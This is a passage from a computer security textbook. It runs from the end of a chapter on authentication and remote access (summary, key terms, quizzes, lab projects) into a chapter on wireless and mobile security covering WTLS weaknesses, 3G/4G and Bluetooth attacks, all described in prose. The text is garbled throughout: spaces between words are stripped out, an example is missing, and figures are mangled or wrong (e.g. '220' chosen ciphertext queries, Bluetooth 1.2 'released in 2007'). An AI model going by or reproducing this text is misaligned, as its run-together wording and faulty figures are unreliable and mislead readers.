Aswithanysoftwareimplementation,therealwaysexiststhepossibilitythatabugcouldopenthesystemtoattack.Bugshavebeencorrectedinmostsoftwarepackagestocloseholesthatmadesystemsvulnerable,andremoteaccessfunctionalityisnoexception.ThisisnotaMicrosoft-onlyphenomenon,asonemightbelievefromthepopularpress.Criticalflawshavebeenfoundinalmosteveryproduct,fromopensystemimplementationssuchasOpenSSHtoproprietarysystemssuchasCisco
IOS.Theimportantissueisnotthepresenceofsoftwarebugs,forassoftwarecontinuestobecomemorecomplex,thisisanunavoidableissue.Thetruekeyisvendorresponsivenesstofixingthebugsoncetheyarediscovered,andthemajorplayers,suchasCiscoandMicrosoft,havebeenveryresponsiveinthisarea.
ConnectionSummaryTherearemanyprotocolsusedforremoteaccessandauthenticationandrelatedpurposes.ThesemethodshavetheirownassignedportsandtheseassignmentsaresummarizedinTable11.2.
Chapter11Review
ForMoreInformationMicrosoft’sTechNetGroupPolicypagehttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx
SANSConsensusPolicyResourceCommunity–PasswordPolicyhttps://www.sans.org/security-resources/policies/general/pdf/password-protection-policy
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutprivilegemanagement,authentication,andremoteaccessprotocols.
Identifythedifferencesamonguser,group,androlemanagement
Privilegemanagementistheprocessofrestrictingauser’sabilitytointeractwiththecomputersystem.
Privilegemanagementcanbebasedonanindividualuserbasis,onmembershipinaspecificgrouporgroups,oronafunction/role.
Keyconceptsinprivilegemanagementaretheabilitytorestrictandcontrolaccesstoinformationandinformationsystems.
Oneofthemethodsusedtosimplifyprivilegemanagementissinglesign-on,whichrequiresausertoauthenticatesuccessfullyonce.Thevalidatedcredentialsandassociatedrightsandprivilegesarethenautomaticallycarriedforwardwhentheuseraccessesothersystemsorapplications.
Implementpasswordanddomainpasswordpolicies
Passwordpoliciesaresetsofrulesthathelpusersselect,employ,andstorestrongpasswords.Tokenscombine“somethingyouhave”with“somethingyouknow,”suchasapasswordorPIN,andcanbehardwareorsoftwarebased.
Passwordsshouldhavealimitedspanandshouldexpireonascheduledbasis.
Describemethodsofaccountmanagement(SSO,timeofday,logicaltoken,accountexpiration)
Administratorshavemanydifferenttoolsattheirdisposaltocontrolaccesstocomputerresourcesincludingpasswordandaccountexpirationmethods.
Userauthenticationmethodscanincludeseveralfactorsincludingtokens.
Userscanbelimitedinthehoursduringwhichtheycanaccessresources.
Resourcessuchasfiles,folders,andprinterscanbecontrolledthroughpermissionsoraccesscontrollists.
Permissionscanbeassignedbasedonauser’sidentityortheirmembershipinoneormoregroups.
Describemethodsofaccessmanagement(MAC,DAC,andRBAC)
Mandatoryaccesscontrolisbasedonthesensitivityoftheinformationorprocessitself.
DiscretionaryaccesscontrolusesfilepermissionsandACLstorestrictaccessbasedonauser’sidentityorgroupmembership.
Role-basedaccesscontrolrestrictsaccessbasedontheuser’sassignedroleorroles.
Rule-basedaccesscontrolrestrictsaccessbasedonadefinedsetof
rulesestablishedbytheadministrator.
Discussthemethodsandprotocolsforremoteaccesstonetworks
Remoteaccessprotocolsprovideamechanismtoremotelyconnectclientstonetworks.
Awiderangeofremoteaccessprotocolshasevolvedtosupportvarioussecurityandauthenticationmechanisms.
Remoteaccessisgrantedviaremoteaccessservers,suchasRRASorRADIUS.
Identifyauthentication,authorization,andaccounting(AAA)protocols
Authenticationisacornerstoneelementofsecurity,connectingaccesstoapreviouslyapproveduserID.
Authorizationistheprocessofdeterminingwhetheranauthenticateduserhaspermission.
Accountingprotocolsmanageconnectiontimeandcostrecords.
Explainauthenticationmethodsandthesecurityimplicationsintheiruse
Password-basedauthenticationisstillthemostwidelyusedbecauseofcostandubiquity.
Ticket-basedsystems,suchasKerberos,formthebasisformostmodernauthenticationandcredentialingsystems.
Implementvirtualprivatenetworks(VPNs)andtheirsecurityaspects
VPNsuseprotocolstoestablishaprivatenetworkoverapublicnetwork,shieldingusercommunicationsfromoutsideobservation.
VPNscanbeinvokedviamanydifferentprotocolmechanismsand
involveeitherahardwareorsoftwareclientoneachendofthecommunicationchannel.
DescribeInternetProtocolSecurity(IPsec)anditsuseinsecuringcommunications
IPsecisthenativemethodofsecuringIPpackets;itisoptionalinIPv4andmandatoryinIPv6.
IPsecusesAuthenticationHeaders(AH)toauthenticatepackets.
IPsecusesEncapsulatingSecurityPayload(ESP)toprovideconfidentialityserviceatthedatagramlevel.
KeyTermsAAA(305)accesscontrol(311)accesscontrollist(ACL)(300)accounting(305)administrator(290)attribute-basedaccesscontrol(ABAC)(303)authentication(305)AuthenticationHeader(AH)(41)authenticationserver(AS)(308)authorization(305)contentprotection(324)contextprotection(325)discretionaryaccesscontrol(DAC)(302)domaincontroller(293)domainpasswordpolicy(293)EncapsulatingSecurityPayload(ESP)(41)eXtensibleAccessControlMarkupLanguage(XACML)(304)
group(291)grouppolicyobject(GPO)(293)identification(305)InternetKeyExchange(IKE)(329)InternetProtocolSecurity(IPsec)(324)InternetSecurityAssociationandKeyManagementProtocol
(ISAKMP)(41)Kerberos(308)keydistributioncenter(KDC)(308)Layer2TunnelingProtocol(L2TP)(320)mandatoryaccesscontrol(MAC)(301)Oakley(41)passwordpolicy(292)permissions(290)Point-to-PointTunnelingProtocol(PPTP)(317)privilegemanagement(288)privileges(288)remoteaccessserver(RAS)(305)rights(289)role(292)role-basedaccesscontrol(RBAC)(303)root(290)rule-basedaccesscontrol(303)SecureKeyExchangeMechanismforInternet(SKEMI)(41)securityassociation(SA)(325)singlesign-on(SSO)(294)superuser(290)ticket-grantingserver(TGS)(308)token(296)user(289)username(289)
virtualprivatenetwork(VPN)(323)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1._______________isanauthenticationmodeldesignedaroundtheconceptofusingticketsforaccessingobjects.
2._______________isdesignedaroundthetypeoftaskspeopleperform.
3.AformalmannerofdescribingthenecessaryandsufficientportionsoftheIPsecprotocolseriestoachieveaspecificlevelofprotectionisa(n)_______________.
4._______________describesasystemwhereeveryresourcehasaccessrulessetforitallofthetime.
5._______________isanauthenticationprocesswheretheusercanentertheiruserID(orusername)andpasswordandthenbeabletomovefromapplicationtoapplicationorresourcetoresourcewithouthavingtosupplyfurtherauthenticationinformation.
6.InIPsec,asecurityassociationisdefinedbyaspecificcombinationof_______________and_______________.
7.Theprotectionofthedataportionofapacketis_______________.8.Theprotectionoftheheaderportionofapacketis
_______________.
9._______________isakeymanagementandexchangeprotocolusedwithIPsec.
10.Theprocessofcomparingcredentialstothoseestablishedduringtheidentificationprocessisreferredtoas_______________.
Multiple-ChoiceQuiz1.Authenticationistypicallybaseduponwhat?
A.Somethingauserpossesses
B.Somethingauserknows
C.Somethingmeasuredonauser,suchasafingerprint
D.Alloftheabove
2.OnaVPN,trafficisencryptedanddecryptedat:A.Endpointsofthetunnelonly
B.Users’machines
C.Eachdeviceateachhop
D.Thedatalinklayerofaccessdevices
3.Aticket-grantingserverisanimportantelementinwhichofthefollowingauthenticationmodels?
A.L2TP
B.RADIUS
C.PPP
D.Kerberos
4.WhatprotocolisusedforRADIUS?A.UDP
B.NetBIOS
C.TCP
D.Proprietary
5.Underwhichaccesscontrolsystemiseachpieceofinformationandeverysystemresource(files,devices,networks,andsoon)labeledwithitssensitivitylevel?
A.Discretionaryaccesscontrol
B.Resourceaccesscontrol
C.Mandatoryaccesscontrol
D.Mediaaccesscontrol
6.IPsecprovideswhichoptionsassecurityservices?A.ESPandAH
B.ESPandAP
C.EAandAP
D.EAandAH
7.SecureShelluseswhichporttocommunicate?A.TCPport80
B.UDPport22
C.TCPport22
D.TCPport110
8.ElementsofKerberosincludewhichofthefollowing?A.Tickets,ticket-grantingserver,ticket-authorizingagent
B.Ticket-grantingticket,authenticationserver,ticket
C.Servicesserver,Kerberosrealm,ticketauthenticators
D.Client-to-serverticket,authenticationserverticket,ticket
9.ToestablishaPPTPconnectionacrossafirewall,youmustdo
whichofthefollowing?
A.Donothing;PPTPdoesnotneedtocrossfirewallsbydesign.
B.Donothing;PPTPtrafficisinvisibleandtunnelspastfirewalls.
C.OpenaUDPportofchoiceandassignittoPPTP.
D.OpenTCPport1723.
10.ToestablishanL2TPconnectionacrossafirewall,youmustdowhichofthefollowing?
A.Donothing;L2TPdoesnotcrossfirewallsbydesign.
B.Donothing;L2TPtunnelspastfirewalls.
C.OpenaUDPportofchoiceandassignittoL2TP.
D.OpenUDPport1701.
EssayQuiz1.Aco-workerwithastrongWindowsbackgroundishavingdifficulty
understandingUNIXfilepermissions.DescribeUNIXfilepermissionsforhim.CompareUNIXfilepermissionstoWindowsfilepermissions.
2.Howareauthenticationandauthorizationalikeandhowaretheydifferent.Whatistherelationship,ifany,betweenthetwo?
3.WhatisaVPNandwhattechnologiesareusedtocreateone?
LabProjects
•LabProject11.1
Usingtwoworkstationsandsomerouters,setupasimpleVPN.UsingWireshark(asharewarenetworkprotocolanalyzer,availableathttp://wireshark.com),observetrafficinsideandoutsidethetunneltodemonstrateprotection.
•LabProject11.2UsingfreeSSHdandfreeFTPd(bothsharewareprograms,availableatwww.freesshd.com)andWireshark,demonstratethesecurityfeaturesofSSHcomparedtoTelnetandFTP.
chapter12 WirelessSecurityandMobileDevices
Wemustplanforfreedom,andnotonlyforsecurity,iffornootherreasonthanthatonlyfreedomcanmakesecuritysecure.
W
—KARLPOPPER
Inthischapter,youwilllearnhowto
Describethedifferentwirelesssystemsinusetoday
DetailWAPanditssecurityimplications
Identify802.11’ssecurityissuesandpossiblesolutions
Examinetheelementsneededforenterprisewirelessdeployment
Examinethesecurityofmobilesystems
irelessisincreasinglythewaypeopleaccesstheInternet.Becausewirelessaccessisconsideredaconsumerbenefit,manybusinesseshaveaddedwirelessaccesspointstolurecustomersintotheirshops.
Withtherolloutoffourth-generation(4G)high-speedcellularnetworks,peoplearealsoincreasinglyaccessingtheInternetfromtheirmobilephones.Themassivegrowthinpopularityofnontraditionalcomputerssuchasnetbooks,e-readers,andtabletshasalsodriventhepopularityofwirelessaccess.Aswirelessuseincreases,thesecurityofthewirelessprotocolshas
becomeamoreimportantfactorinthesecurityoftheentirenetwork.Asasecurityprofessional,youneedtounderstandwirelessnetworkapplicationsbecauseoftherisksinherentinbroadcastinganetworksignalwhereanyonecaninterceptit.Sendingunsecuredinformationacrosspublicairwavesistantamounttopostingyourcompany’spasswordsbythefrontdoorofthebuilding.Thischapteropenswithlooksatseveralcurrentwirelessprotocolsandtheirsecurityfeatures.Thechapterfinisheswithanexaminationofmobilesystemsandtheirsecurityconcerns.
IntroductiontoWirelessNetworkingWirelessnetworkingisthetransmissionofpacketizeddatabymeansofaphysicaltopologythatdoesnotusedirectphysicallinks.Thisdefinition
canbenarrowedtoapplytonetworksthatuseradiowavestocarrythesignalsovereitherpublicorprivatebands,insteadofusingstandardnetworkcabling.Someproprietaryapplicationslikelong-distancemicrowavelinksusepoint-to-pointtechnologywithnarrowbandradiosandhighlydirectionalantennas.However,thistechnologyisnotcommonenoughtoproduceanysignificantresearchintoitsvulnerabilities,andanythingthatwasdevelopedwouldhavelimitedusefulness.Sothischapterfocusesonpoint-to-multipointsystems,thetwomostcommonofwhicharethefamilyofcellularprotocolsandIEEE802.11.IEEE802.11isafamilyofprotocolsinsteadofasinglespecification;thisisasummarytableofthe802.11family.
TheIEEE802.11protocolhasbeenstandardizedbytheIEEEforwirelesslocalareanetworks(LANs).Threeversionsarecurrentlyinproduction—802.11g,802.11a,and802.11n.Thelateststandardis802.11ac,butitprovidesbackwardcompatibilitywith802.11ghardware.CellularphonetechnologyhasmovedrapidlytoembracedatatransmissionandtheInternet.TheWirelessApplicationProtocol(WAP)wasoneofthepioneersofmobiledataapplications,butithasbeenovertakenbyavarietyofprotocolspushingustofourth-generation(4G)mobilenetworks.
TechTip
WirelessSystemsThereareseveraldifferentwirelessbandsincommonusetoday,themostcommonofwhichistheWi-Fiseries,referringtothe802.11WirelessLANstandardscertifiedbytheWi-FiAlliance.AnothersetofbandsisWiMAX,whichreferstothesetof802.16wirelessnetworkstandardsratifiedbytheWiMAXForum.Lastly,thereisZigBee,alow-power,personalareanetworkingtechnologydescribedbytheIEEE802.15.4series.
Bluetoothisashort-rangewirelessprotocoltypicallyusedonsmalldevicessuchasmobilephones.EarlyversionsofthesephonesalsohadBluetoothonanddiscoverableasadefault,makingthecompromiseofanearbyphoneeasy.Securityresearchhasfocusedonfindingproblemswiththesedevicessimplybecausethedevicesaresocommon.Thesecurityworldignoredwirelessforalongtime,andthenwithinthe
spaceofafewmonths,itseemedlikeeveryonewasattemptingtobreachthesecurityofwirelessnetworksandtransmissions.Onereasonwirelesssuddenlyfounditselftobesuchatargetisthatwirelessnetworksaresoabundantandsounsecured.Thedramaticproliferationoftheseinexpensiveproductshasmadethesecurityramificationsoftheprotocolastonishing.Nomatterwhatthesystem,wirelesssecurityisaveryimportanttopicas
moreandmoreapplicationsaredesignedtousewirelesstosenddata.Wirelessisparticularlyproblematicfromasecuritystandpoint,becausethereisnocontroloverthephysicallayerofthetraffic.InmostwiredLANs,theadministratorshavephysicalcontroloverthenetworkandcancontroltosomedegreewhocanactuallyconnecttothephysicalmedium.Thispreventslargeamountsofunauthorizedtrafficandmakessnoopingaroundandlisteningtothetrafficdifficult.Wirelessdoesawaywiththephysicallimitations.Ifanattackercangetcloseenoughtothesignal’ssourceasitisbeingbroadcast,hecanattheveryleastlistentotheaccesspointandclientstalkingtocaptureallthepacketsforexamination,asdepictedinFigure12.1.
•Figure12.1Wirelesstransmissionextendingbeyondthefacility’swalls
Attackerscanalsotrytomodifythetrafficbeingsentortrytosendtheirowntraffictodisruptthesystem.Inthischapter,youwilllearnaboutthedifferenttypesofattacksthatwirelessnetworksface.
MobilePhonesWhencellularphonesfirsthitthemarket,securitywasn’tanissue—ifyouwantedtokeepyourphonesafe,you’dsimplykeepitphysicallysecureandnotloanittopeopleyoudidn’twantmakingcalls.Itsonlyfunctionwasthatofatelephone.
•Earlycellphonesjustallowedyoutomakecalls.
Theadvanceofdigitalcircuitryhasaddedamazingpowerinsmallerandsmallerdevices,causingsecuritytobeanissueasthesoftwarebecomesmoreandmorecomplicated.Today’ssmallandinexpensiveproductshavemadethewirelessmarketgrowbyleapsandbounds,astraditionalwirelessdevicessuchascellularphonesandpagershavebeenreplacedbytabletsandsmartphones.
•Today’sphonesallowyoutocarrycomputersinyourpocket.
Today’ssmartphonessupportmultiplewirelessdataaccessmethods,
including802.11,Bluetooth,andcellular.ThesemobilephonesandtabletdeviceshavecausedconsumerstodemandaccesstotheInternetanytimeandanywhere.Thishasgeneratedademandforadditionaldataservices.TheWirelessApplicationProtocol(WAP)attemptedtosatisfytheneedsformoredataonmobiledevices,butitisfallingbythewaysideasthemobilenetworks’capabilitiesincrease.TheneedformoreandmorebandwidthhaspushedcarrierstoadoptamoreIP-centricroutingmethodologywithtechnologiessuchasHighSpeedPacketAccess(HSPA)andEvolutionDataOptimized(EVDO).Mobilephoneshaveruthlesslyadvancedwithnewtechnologiesandservices,causingphonesandthecarriernetworksthatsupportthemtobedescribedingenerations—1G,2G,3G,and4G.1Greferstotheoriginalanalogcellularstandard,AdvancedMobilePhoneSystem(AMPS).2Greferstothedigitalnetworkthatsupersededit.3Gisthesystemofmobilenetworksthatfollowed,withmanydifferentimplementationscarryingdataatupto400Kbps.4GrepresentsthecurrentstateofmobilephoneswithLTEbeingtheprimarymethod.4Gallowscarrierstoofferawiderarrayofservicestotheconsumer,includingbroadbanddataserviceupto14.4Mbpsandvideocalling.4GisalsoamovetoanentirelyIP-basednetworkforallservices,runningvoiceoverIP(VoIP)onyourmobilephoneandspeedsupto1Gbps.Allofthese“gee-whiz”featuresarenice,buthowsecureareyourbits
andbytesgoingtobewhenthey’retravelingacrossamobilecarrier’snetwork?Alltheprotocolsmentionedhavetheirownsecurityimplementations—WAPappliesitsownWirelessTransportLayerSecurity(WTLS)toattempttosecuredatatransmissions,butWAPstillhasissuessuchasthe“WAPgap”(asdiscussednext).3Gnetworkshaveattemptedtopushalargeamountofsecuritydownthestackandrelyontheencryptiondesignedintothewirelessprotocol.
TechTip
RelationshipofWAPandWTLSWirelessApplicationProtocolisalightweightprotocoldesignedformobiledevices.WirelessTransportLayerSecurityisalightweightsecurityprotocoldesignedforWAP.
WirelessApplicationProtocolWAPwasintroducedtocompensatefortherelativelylowamountofcomputingpoweronhandhelddevicesaswellasthegenerallypoornetworkthroughputofcellularnetworks.ItusestheWirelessTransportLayerSecurity(WTLS)encryptionscheme,whichencryptstheplaintextdataandthensendsitovertheairwavesasciphertext.Theoriginatorandtherecipientbothhavekeystodecryptthedataandreproducetheplaintext.Thismethodofensuringconfidentialityisverycommon,andiftheencryptioniswelldesignedandimplemented,itisdifficultforunauthorizeduserstotakecapturedciphertextandreproducetheplaintextthatcreatedit.AsdescribedinChapter5,confidentialityistheabilitytokeepprotecteddataasecret.WTLSusesamodifiedversionoftheTransportLayerSecurity(TLS)protocol,whichisthereplacementforSecureSocketsLayer(SSL).TheWTLSprotocolsupportsseveralpopularbulkencryptionalgorithms,includingDataEncryptionStandard(DES),TripleDES(3DES),RC5,andInternationalDataEncryptionAlgorithm(IDEA).
CrossCheckSymmetricEncryptionInChapter5youlearnedaboutsymmetricencryption,includingDES,3DES,RC5,andIDEA.Inthecontextofwirelesscommunication,whatalgorithmwouldprotectyourdatathebest?Whataresomepossibleproblemswiththesealgorithms?
WTLSimplementsintegritythroughtheuseofmessageauthenticationcodes(MACs).AMACalgorithmgeneratesaone-wayhashofthe
compressedWTLSdata.WTLSsupportstheMD5andSHAMACalgorithms.TheMACalgorithmisalsodecidedduringtheWTLShandshake.TheTLSprotocolthatWTLSisbasedonisdesignedaroundInternet-basedcomputers,machinesthathaverelativelyhighprocessingpower,largeamountsofmemory,andsufficientbandwidthavailableforInternetapplications.DevicesthatWTLSmustaccommodatearelimitedinalltheserespects.Thus,WTLShastobeabletocopewithsmallamountsofmemoryandlimitedprocessorcapacity,aswellaslonground-triptimesthatTLScouldnothandlewell.TheserequirementsaretheprimaryreasonsthatWTLShassecurityissues.Astheprotocolisdesignedaroundmorecapableserversthandevices,
theWTLSspecificationcanallowconnectionswithlittletonosecurity.ClientswithlowmemoryorCPUcapabilitiescannotsupportencryption,andchoosingnullorweakencryptiongreatlyreducesconfidentiality.Authenticationisalsooptionalintheprotocol,andomittingauthenticationreducessecuritybyleavingtheconnectionvulnerabletoaman-in-the-middle–typeattack.Inadditiontothegeneralflawsintheprotocol’simplementation,severalknownsecurityvulnerabilitiesexist,includingthosetothechosen-plaintextattack,thePKCS#1attack,andthealertmessagetruncationattack.Thechosen-plaintextattackworksontheprincipleofapredictable
initializationvector(IV).Bythenatureofthetransportmediumthatitisusing,WAP,WTLSneedstosupportunreliabletransport.ThisforcestheIVtobebasedondataalreadyknowntotheclient,andWTLSusesalinearIVcomputation.BecausetheIVisbasedonthesequencenumberofthepacket,andseveralpacketsaresentunencrypted,entropyisseverelydecreased.Thislackofentropyintheencrypteddatareducesconfidentiality.
TechTip
WeaknessinWAPAggregation
WAPisapoint-to-multipointprotocol,butitcanfacedisruptionsorattacksbecauseitaggregatesatwell-knownpoints:thecellularantennatowers.
NowconsiderthePKCS#1attack.PublicKeyCryptographyStandards(PKCS),usedinconjunctionwithRSAencryption,providestandardsforformattingthepaddingusedtogenerateacorrectlyformattedblocksize.Whentheclientreceivestheblock,itwillreplytothesenderastothevalidityoftheblock.Anattackertakesadvantageofthisbyattemptingtosendmultipleguessesatthepaddingtoforceapaddingerror.Invulnerableimplementations,whenRSAsignaturesandencryptionareperformedperPKCS#1,theRSAmessagescanbedecryptedwithapproximately220chosenciphertextqueries.AlertmessagesinWTLSaresometimessentinplaintextandarenotauthenticated.Thisfactcouldallowanattackertooverwriteanencryptedpacketfromtheactualsenderwithaplaintextalertmessage,leadingtopossibledisruptionoftheconnectionthrough,forinstance,atruncationattack.Someconcernovertheso-calledWAPgapinvolvesconfidentialityof
informationwherethetwodifferentnetworksmeet,theWAPgateway,asshowninFigure12.2.
•Figure12.2TheWAPgapshowsanunencryptedspacebetweentwoencipheredconnections.
WTLSactsasthesecurityprotocolfortheWAPnetwork,andTLSisthestandardfortheInternet,sotheWAPgatewayhastoperformtranslationfromoneencryptionstandardtotheother.ThistranslationforcesallmessagestobeseenbytheWAPgatewayinplaintext.Thisisaweakpointinthenetworkdesign,butfromanattacker’sperspective,it’samuchmoredifficulttargetthantheWTLSprotocolitself.ThreatstotheWAPgatewaycanbeminimizedthroughcarefulinfrastructuredesign,suchasselectingasecurephysicallocationandallowingonlyoutboundtrafficfromthegateway.Ariskofcompromisestillexists,however,andanattackerwouldfindaWAPgatewayanespeciallyappealingtarget,asplaintextmessagesareprocessedthroughitfromallwirelessdevices,notjustasingleuser.Thesolutionforthisistohaveend-to-endsecuritylayeredoveranythingunderlying,ineffectcreatingaVPNfromtheendpointtothemobiledevice,ortostandardizeonafullimplementation
ofTLSforend-to-endencryptionandstrongauthentication.Thelimitednatureofthedeviceshamperstheabilityofthesecurityprotocolstooperateasintended,compromisinganyrealsecuritytobeimplementedonWAPnetworks.
3GMobileNetworksOurcellphonesareoneofthemostvisibleindicatorsofadvancingtechnology.Withinrecentmemory,wewereforcedtoswitchfromoldanalogphonestodigitalmodels.Thenetworkshavebeenupgradedto3G,greatlyenhancingspeedandloweringlatency.Thishasreducedtheneedforlightweightprotocolstohandledatatransmission,andmorestandardprotocolssuchasIPcanbeused.Theincreasedpowerandmemoryofthehandhelddevicesalsoreducetheneedforlighter-weightencryptionprotocols.Thishascausedtheprotocolsusedfor3Gmobiledevicestobuildintheirownencryptionprotocols.Securitywillrelyontheselower-levelprotocolsorstandardapplication-levelsecurityprotocolsusedinnormalIPtraffic.Severalcompetingdatatransmissionstandardsexistfor3Gnetworks,
suchasHSPAandEVDO.However,allthestandardsincludetransportlayerencryptionprotocolstosecurethevoicetraffictravelingacrossthewirelesssignalaswellasthedatasentbythedevice.Thecryptographicstandardproposedfor3GisknownasKASUMI.ThismodifiedversionoftheMISTY1algorithmuses64-bitblocksand128-bitkeys.Multipleattackshavebeenlaunchedagainstthiscipher.Whiletheattackstendtobeimpractical,thisshowsthatapplicationlayersecurityisneededforsecuretransmissionofdataonmobiledevices.WAPandWTLScanbeusedoverthelower-levelprotocols,buttraditionalTLScanalsobeused.
3G,4G,LTE…What’stheDifference?Intoday’smobilemarketingcampaigns,wehearof3G,4G,andLTE.Whatdothesetermsmean?3Gisthe“old”networktoday,butitisstillverycapableforavarietyofpurposes.4Gphonesaresupposedtobeevenfaster,butthat’snotalwaysthecase.Alotdependsonwhatyouusethephonefor.Thereareseveraltechnologiescalled“4G,”eachwithmultipleimplementations.Thismakesthetermalmostmeaninglessfromatechnicalpointofview.The
InternationalTelecommunicationUnion(ITU),astandardsbody,issuedrequirementsthatanetworkneededtomeettobecalled“4G,”butthoserequirementswereignoredbycarriers.NowthemoveistoLTE,whichstandsforLongTermEvolutionoftheUniversalMobileTelecommunicationsSystem(UMTS).UMTSisthegroupofstandardsthatdefines3GforGSMnetworksacrosstheworld,andnowLTE.TherearenumeroustechnicalimplementationsofLTE,butoneofthekeyelementsistheuseoftwodifferenttypesofairinterfaces(radiolinks),onefordownlink(fromtowertodevice)andoneforuplink(fromdevicetotower).ThisisoneofthereasonsLTEismuchfasterwhenuploadinginformationfromthephonetotheInternet.LTEoffershighspeed(upto30Mbps)andlowlatency.ButnotallLTEisequal.Recenttestsindicateasmuchasanorderofmagnitudedifferenceinspeedsbetweencarriers.AsLTEexpands,newerversions,eachwithitsownsetofcharacteristicspickedfromthe
overall“standard,”aredeployedbycarriers.WhiletheLTE-Astandardhasbeenapproved,nocarrierscurrentlymeettheentirestandard.Eachcarrierhaspickedtheelementsofthestandardtheyfeelmeettheirneeds.Bottomline:4Ghasbecomeamarketingterm,andtheonlyguideonehasistouseactual
surveyresultsintheareaofyourservicetodeterminethebestsolutionforyouruserequirements.
4GMobileNetworksJustasthemobilenetworkcarrierswerefinishingtherolloutof3Gservices,4Gnetworksappearedonthehorizon.Thedesireforanywhere,anytimeInternetconnectivityatspeedsnearthatofawiredconnectiondrivesdeploymentofthesenext-generationservices.4Gcansupporthigh-qualityVoIPconnections,videocalls,andreal-timevideostreaming.Justas3Ghadsomeintermediariesthatwereconsidered2.9G,LTEandWiMAXnetworksaresometimesreferredtoas3.5G,3.75G,or3.9G.Thecarriersaremarketingthesenewnetworksas4G,althoughtheydonotadheretotheITUstandardsfor4Gspeeds.True4Gwouldrequireafirmtomeetallofthetechnicalstandards
issuedbytheITU,includingspecificationsthatapplytothetowersideofthesystem.Someofthe4Grequirementsare
Bebasedonanall-IPpacketswitchednetwork
Offerhighqualityofservicefornext-generationmultimediasupport
Smoothhandoversacrossheterogeneousnetworks
Peakdataratesofuptoapproximately100Mbpsforhighmobility(mobileaccess)
Peakdataratesofuptoapproximately1Gbpsforlowmobilitysuchasnomadic/localwirelessaccess
Dynamicallyshareandusethenetworkresourcestosupportmoresimultaneoususerspercell
Usescalablechannelbandwidthsof5–20MHz,optionallyupto40MHz
Peaklinkspectralefficiencyof15-bps/Hzinthedownlink,and6.75-bps/Hzintheuplink
Toachievetheseandothertechnicalelementsrequiresspecifictower-sideequipmentaswellashandsetspecifications.Differentcarriershavechosendifferentsetsofthesetoincludeintheirofferings,eachbuildingupontheirexistingnetworksandexistingtechnologies.Most4Gdeploymentsarecontinuationsoftechnologiesalready
deployed—justnewerevolutionsofstandards.ThisishowLTE,LTEAdvanced,WiMAX,andWiMAX2wereborn.LTEandWiMAXseriescomefromseparateroots,andarenotinterchangeable.Withinthefamilies,interoperabilityispossibleandisdependentuponcarrierimplementation.
BluetoothBluetoothwasoriginallydevelopedbyEricssonandknownasmulti-communicatorlink;in1998,Nokia,IBM,Intel,andToshibajoinedEricssonandadoptedtheBluetoothname.ThisconsortiumbecameknownastheBluetoothSpecialInterestGroup(SIG).TheSIGnowhasmorethan24,000membersanddrivesthedevelopmentofthetechnologyandcontrolsthespecificationtoensureinteroperability.
•Bluetoothicon
MostpeoplearefamiliarwithBluetoothasitispartofmanymobilephonesandheadsets,suchasthoseshowninFigure12.3.Thisshort-range,low-powerwirelessprotocoltransmitsinthe2.4GHzband,thesamebandusedfor802.11.Theconceptfortheshort-range(approx.32feet)wirelessprotocolistotransmitdatainpersonalareanetworks(PANs).
•Figure12.3HeadsetsandcellphonesaretwoofthemostpopulartypesofBluetooth-capabledevices.
Bluetoothtransmitsandreceivesdatafromavarietyofdevices,themostcommonbeingmobilephones,laptops,printers,andaudiodevices.ThemobilephonehasdrivenalotofBluetoothgrowthandhaseven
spreadBluetoothintonewcarsasamobilephonehands-freekit.Bluetoothhasgonethroughafewreleases.Version1.1wasthefirst
commerciallysuccessfulversion,withversion1.2releasedin2007andcorrectingsomeoftheproblemsfoundin1.1.Version1.2allowsspeedsupto721Kbpsandimprovesresistancetointerference.Version1.2isbackward-compatiblewithversion1.1.Withtherateofadvancementandthelifeofmosttechitems,Bluetooth1seriesisbasicallyextinct.Bluetooth2.0introducedenhanceddatarate(EDR),whichallowsthetransmissionofupto3.0Mbps.Bluetooth3.0hasthecapabilitytousean802.11channeltoachievespeedsupto24Mbps.ThecurrentversionistheBluetooth4.0standardwithsupportforthreemodes:classic,highspeed,andlowenergy.Bluetooth4introducesanewmethodtosupportcollectingdatafrom
devicesthatgeneratedataataverylowrate.Somedevices,suchasmedicaldevices,mayonlycollectandtransmitdataatlowrates.Thisfeature,calledLowEnergy(LE),wasdesignedtoaggregatedatafromvarioussensors,likeheartratemonitors,thermometers,andsoforth,andcarriesthecommercialnameBluetoothSmart.
TechTip
BluetoothSecurityBluetoothshouldalwayshavediscoverablemodeturnedoffunlessyou’redeliberatelypairingadevice.
AsBluetoothbecamepopular,peoplestartedtryingtofindholesinit.Bluetoothfeatureseasyconfigurationofdevicestoallowcommunication,withnoneedfornetworkaddressesorports.Bluetoothusespairingtoestablishatrustrelationshipbetweendevices.Toestablishthattrust,thedevicesadvertisecapabilitiesandrequireapasskey.Tohelpmaintainsecurity,mostdevicesrequirethepasskeytobeenteredintobothdevices;thispreventsadefaultpasskey–typeattack.TheBluetooth’sprotocol
advertisementofservicesandpairingpropertiesiswheresomeofthesecurityissuesstart.
TechTip
BluetoothDataRatesDifferentversionsofBluetoothhavedifferingmaximumdatatransferrates.
BluetoothAttacksAsawirelessmethodofcommunication,Bluetoothisopentoconnectionandattackfromoutsidetheintendedsenderandreceiver.SeveraldifferentattackmodeshavebeendiscoveredthatcanbeusedagainstBluetoothsystems.Bluejackingisatermusedforthesendingofunauthorizedmessagesto
anotherBluetoothdevice.Thisinvolvessettingamessageasaphonebookcontact:
ThentheattackersendsthemessagetothepossiblerecipientviaBluetooth.Originally,thisinvolvedsendingtextmessages,butmorerecentphonescansendimagesoraudioaswell.Apopularvariantofthisisthetransmissionof“shock”images,featuringdisturbingorcrudephotos.AsBluetoothisashort-rangeprotocol,theattackandvictimmustbewithinroughly10yardsofeachother.Thevictim’sphonemustalsohaveBluetoothenabledandmustbeindiscoverablemode.Onsomeearlyphones,thiswasthedefaultconfiguration,andwhileitmakesconnectingexternaldeviceseasier,italsoallowsattacksagainstthephone.IfBluetoothisturnedoff,orifthedeviceissettonondiscoverable,
bluejackingcanbeavoided.Bluesnarfingissimilartobluejackinginthatitusesthesamecontact
